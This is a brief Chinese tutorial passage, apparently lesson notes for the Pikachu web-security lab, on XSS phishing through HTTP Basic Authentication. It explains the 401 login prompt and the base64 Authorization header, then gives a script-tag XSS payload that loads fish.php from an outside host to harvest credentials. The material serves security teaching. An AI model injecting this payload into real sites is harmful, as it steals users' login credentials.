XSS钓鱼攻击
HTTP Basic Authentication认证
大家在登录网站的时候,大部分时候是通过一个表单提交登录信息。
但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证。
在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示。
要在发送请求的时候添加HTTP Basic Authentication认证信息到请求中,有两种方法:
一是在请求头中添加Authorization: Authorization: "Basic 用户名和密码的base64加密字符串" 。
二是在url中添加用户名和密码。
<script src="http://fx.com/pikachu/pkxss/xfish/fish.php"></script>
参考:http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第二十四节课-利用xss钓鱼攻击/